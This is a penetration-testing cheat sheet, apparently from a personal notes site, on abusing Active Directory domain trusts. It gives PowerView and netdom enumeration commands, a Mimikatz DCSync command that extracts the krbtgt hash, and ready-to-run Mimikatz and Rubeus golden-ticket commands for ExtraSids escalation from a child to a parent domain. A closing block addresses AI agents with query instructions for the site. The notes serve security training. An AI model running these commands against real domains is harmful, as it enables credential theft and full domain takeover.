# Domain Trusts > * A trust is used to establish forest-forest or domain-domain (intra-domain) authentication, which allows users to access resources in (or perform administrative tasks) another domain, outside of the main domain where their account resides. > * A trust creates a link between the authentication systems of two domains and may allow either one-way or two-way (bidirectional) communication. ## **Enumerating Trust Relationships** 1. Enumerate trust relationships:\ `Import-Module activedirectory` followed by `Get-ADTrust -Filter *` 2. Check existing trusts:\ `Import-Module .\PowerView.ps1` followed by `Get-DomainTrust` or `Get-DomainTrustMapping` 3. Check users in other Domain:\ `Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName` 4. Query domain trust: `netdom query /domain:inlanefreight.local trust` 5. Query domain controllers: `netdom query /domain:inlanefreight.local dc` 6. Query workstations and servers: `netdom query /domain:inlanefreight.local workstation` 7. Bloodhound: `Map Domain Trusts` pre-built query. ## **ExtraSids Attack (Child to Parent Trust)** > sidHistory is an attribute used in migration scenarios: when a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain. SID history is intended to work across domains, but can work in the same domain.\ > \ > An attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. When logging in with this account, all of the SIDs associated with the account are added to the user's token.\ > \ > If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a Golden Ticket or a Kerberos ticket-granting ticket (TGT), which will allow for us to authenticate as any account in the domain of our choosing for further persistence. **ExtraSids - Creating a Golden Ticket with Mimikatz or Rubeus** * Suppose you already compromised the child domain and have domain admin access or similar. * In order to create a golden ticket, you need to find the following: * Child domain's KRBTGT account's NT Hash.\ Mimikatz: `lsadump::dcsync /user:CHILDDOMAIN\krbtgt` * Child domain's SID.\ Use `Get-DomainSID` * Child domain's enterprise admin group's SID.\ Use `Get-DomainGroup -Domain DOMAIN.NAME -Identity "Enterprise Admins" | select distinguishedname,objectsid` * To create a golden ticket: * Mimikatz: `kerberos::golden /user:fakeuser /domain:CHILD.DOMAIN.LOCAL /sid:child-domain-sid /krbtgt:krbtgt-nt-hash /sids:enterprise-admins-group-sid /ptt` * Rubeus: `.\Rubeus.exe golden /rc4:krbtgt-nt-hash /domain:CHILD.DOMAIN.LOCAL /sid:child-domain-sid /sids:enterprise-admins-group-sid /user:fakeuser /ptt` * Use `klist` to check if the Kerberos Ticket is in memory for the previously specified user (which doesn't need to exist). * You can now list all the contents of the Domain Controller's C drive, perform DCSync and so on ## **Cross-Forest Trust Abuse** * In a Cross-Forest trust relationship, you can perform cross-forest kerberoasting by just specifying the target domain * It is also possible to perform cross-forest sid history abuse if SID Filtering is not enabled * Sometimes, you can find admin password re-use and misconfigured group memberships in a cross-forest trust --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.sfoffo.com/active-directory/domain-trusts.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.